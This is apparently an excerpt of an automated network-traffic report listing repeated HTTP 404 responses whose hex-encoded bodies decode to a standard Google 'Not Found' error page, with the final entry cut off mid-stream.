                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 